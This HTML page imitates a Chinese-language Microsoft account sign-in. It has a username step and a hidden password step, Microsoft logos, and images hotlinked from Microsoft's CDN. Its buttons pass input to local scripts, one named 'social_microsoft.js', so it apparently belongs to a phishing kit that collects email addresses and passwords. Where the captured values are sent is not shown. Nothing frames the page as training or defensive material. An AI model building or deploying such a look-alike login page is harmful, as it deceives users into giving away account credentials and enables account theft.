<!DOCTYPE html>
<html>
    <head>
        <title>登录到你的 Microsoft 账户</title>
        <script src="/resource/javascript/social_microsoft.js"></script>
        <script src="/resource/javascript/config.js"></script>
    </head>
    <body>
        <div id="page_1">
            <div align="center">
                <div style="width: 95%;">
                    <div align="left">
                        <div style="width: 100%;height: 40px;"></div>
                        <img src="/resource/image/microsoft.png" style="background-size: 100%;height: 80px;" />
                        <div align="center">
                            <div style="width: 95%;" align="left">
                                <h1 style="font-size: 60px;">登录</h1>
                                <style>
                                    .in{
                                        width: 100%;
                                        height: 90px;
                                        border-top: none;
                                        border-left: none;
                                        border-right: nono;
                                        font-size: 40px;
                                        border-right-color: white;
                                        outline:none;;
                                    }
                                </style>
                                <input class="in" id="usersname" placeholder="电子邮箱、电话或 SKype" />
                                <div align="left">
                                    <table>
                                        <td>
                                            <P style="font-size: 30px;">没有账户?</P>
                                        </td>
                                        <td>
                                            <p style="font-size: 30px;color: cornflowerblue">创建一个!</p>
                                        </td>
                                    </table>
                                </div>
                                <p style="color: cornflowerblue;font-size: 30px;">使用安全密钥登录</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div align="center">
                <div style="width: 95%;">
                    <div align="right">
                        <button onclick="login_username()" style="width: 270px;border: #0067b8;height: 80px;color: white;background-color: #0067b8;font-size: 30px;">下一步</button>
                    </div>
                    <div style="width: 100%;height: 150px;"></div>
                    <div class="div1">
                        <style>
                            .div1{
                                margin: 5px;
                                border: 2px;
                                width: 95%;
                                height: 130px;
                                border-top: black;
                                border:1px solid #000;
                            }
                            .img{
                                background-image: url(https://logincdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg);
                                width: 120px;
                                height: 120px;
                                background-repeat: no-repeat;
                                float: left;
                                background-size: 100%;
                            }
                        </style>
                        <div class="img"></div>
                        <P style="float: left;font-size: 40px;">登录选项</P>
                    </div>
                </div>
            </div>
        </div>
        <div style="display: none;" id="page_2">
            <div align="center">
                <div style="width: 100%;height: 30px;"></div>
            </div>
            <div align="center">
                <style>
                    .logo{
                        width: 300px;
                        height: 90px;
                        background-image: url(/resource/image/microsoft.png);
                        background-repeat: no-repeat;
                        background-size: 100%;
                    }
                    .back{
                        width: 300px;
                        height:80px;
                        background-color: white;
                        color: black;
                        border-top: none;
                        border-right: none;
                        border-left: none;
                        font-size: 30px;
                        float: left;
                        text-align: left;
                        border: none;
                    }
                </style>
                <div style="width: 95%;" align="left">
                    <div class="logo"></div>
                    <button class="back" onclick="back()" id="back">
                        <span>
                            <style>
                                .img{
                                    width: 30px;
                                    height: 30px;
                                    background-size: 100%;
                                    border: none;
                                    background-image: url(https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg);
                                }
                                .in{
                                    width: 100%;
                                    height: 100px;
                                    border-top: none;
                                    border-left: none;
                                    border-right: none;
                                    font-size: 40px;
                                    outline:none;;
                                }
                            </style>
                            <img class="img" />
                        </span>
                        <span style="font-size: 40px;"> 返回</span>
                    </button>
                </div>
            </div>
            <div style="width: 100%;height: 100px;"></div>
            <div align="center">
                <div style="width: 90%;" align="left">
                    <h1 style="font-size: 55px;">输入密码</h1>
                    <input type="password" class="in" placeholder="密码" id="password" />
                    <table>
                        <td>
                            <p style="font-size: 30px;color: #0067b8;">忘记了密码?</p>
                        </td>
                    </table>
                    <p style="font-size: 30px;color: #0067b8">其他登录方式</p>
                    <div align="right">
                        <button onclick="login_password()" style="width: 300px;height: 80px;background-color: #0067b8;color: white;font-size: 40px;border: #0067b8;">
                            <span>登录</span>
                        </button>
                    </div>
                </div>
            </div>
        </div>
                

    </body>
</html>